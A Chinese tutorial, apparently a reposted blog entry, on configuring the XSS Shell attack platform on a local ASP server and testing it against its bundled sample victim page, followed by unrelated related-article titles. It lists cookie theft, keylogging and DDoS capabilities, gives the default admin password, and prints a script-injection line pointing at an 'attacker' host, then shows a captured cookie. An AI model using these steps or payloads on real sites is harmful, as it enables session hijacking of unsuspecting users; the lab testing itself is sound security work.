利用XSS Shell进行XSS测试
来源:互联网 发布:linux命令行创建文件 编辑:程序博客网 时间:2024/06/01 09:19
0x01 XSS Shell简介
XSS Shell一个windows环境下的XSS攻击平台。下载地址为:http://www.portcullis-security.com/tools/free/XSSShell039.zip
利用XSS Shell,攻击者可以轻松攻击存在XSS漏洞的网站的用户。目前可以实施的攻击包括但不限于:
1、获取用户cookie;
2、获取用户当前页面内容;
3、弹出窗口;
4、执行JS代码;
5、弹出与用户交互窗口;
6、获取键盘日志(测试中未成功);
7、获取鼠标日志(测试中未成功);
8、获取剪贴板(仅限IE);
9、获取内部IP(仅支持Mozilla* + JVM)
10、获取用户浏览历史;
11、Make a request with victim credentials (目前不了解)
12、DDoS;
13、耗尽用户计算机CPU资源。
// 注:XSS,即Cross-Site Script,跨站脚本攻击。
0x02 ASP测试环境快速搭建
要使用XSS Shell ,需要搭建asp web服务器的,以监听请求。为了简便起见,测试中使用Aws2.2(AspWebServer)快速搭建asp环境。
Aws的最新版为3.0版本。官方网站为:http://www.hicoder.com/
Aws搭建asp环境非常简单,将其拷贝到测试站点根目录后运行即可。
0x03 XSS Shell的配置
创建XSS Shell管理端
1. 将"xssshell" 文件夹拷贝到Aws所在目录$path。
2. 将"db"文件夹拷贝到"xssshell"下更隐蔽的目录$hpath下;
3. 修改"xssshell/db.asp"中Const DBPATH 的值为$hpath\shell.mdb。默认情况下为:
4. 修改"xssshell/db.asp"的默认管理密码。初始密码: w00t:
5. 访问http://127.0.0.1/xssshell/,输入管理密码,点击login,可以看到如下界面:
上图中,最左侧为功能区域,中间部分为在线目标列表区域,最右侧为日志记录区域。可以看到目前没有目标在线。因此,下面需要配置XSS Shell。
配置XSS Shell
1. 打开"xssshell.asp".
2. 将"SERVER"设为xssshell所在目录。本次测试中为: "http://127.0.0.1/";
3. 核对 "ME", "CONNECTOR", "COMMANDS_URL" 的值。
测试中可以将server的值替换为之前的设置项(http://127.0.0.1),在浏览器中打开完整的完整的URL,如果页面显示正常,表明配置正确。
0x04 测试sample_victim
以XSS Shell自带的sample_victim为例,我们进行测试,测试之前还需要修改sample_victim/default.asp中的测试跨站语句:
<script src="http://attacker:81/xssshell.asp?v=336699"></script>
修改为:
<script src="http://127.0.0.1/xssshell.asp?v=336699"></script>
修改完成后,在其他浏览器窗口中打开:http://127.0.0.1/sample_victim/
此时可以看到XSS Shell管理页面可以看到有一台目标用户上线:(127.0.0.1/158534)
此时点击最左侧的功能项,以获取cookie为例:
可以看到在最右侧的显示区域,成功获取了目标用户的cookie。
同理,我们可以执行其他的功能,比如最简单的弹窗测试。
在页面左下角的Parameters : 区域,输入测试语句"XSS by Phoenix!",点击"alert(<message>) ",可以看到目标用户的浏览器弹出相应窗口:
更多的利用案例将在后续补充。
- 利用XSS Shell进行XSS测试
- 利用XSS Shell进行XSS测试
- 利用data:进行XSS测试
- 测试xss
- xss 测试
- XSS测试
- xss 测试
- 测试XSS
- XSS测试
- 利用html编码进行xss攻击
- Web应用进行XSS漏洞测试
- Web应用进行XSS漏洞测试
- XSS
- xss
- xss
- xss
- xss
- xss
- Scroller简介
- NetBeans启动提示“JVM creation failed”
- ubuntu11.10使用root权限与使用root登录
- android编译系统分析
- PHP购物车怎么生成订单号
- 利用XSS Shell进行XSS测试
- JavaScript修改css样式style
- 转:profibus dp和pa有什么差别
- struts2中获取request、response
- spring自动建表 很蛋疼的问题(exception)create update
- JS 定时器 (setInterval 和 setTimeout 函数)
- Linux下使用SFTP命令
- TKPROF工具
- 智能指针scoped_ptr组件的使用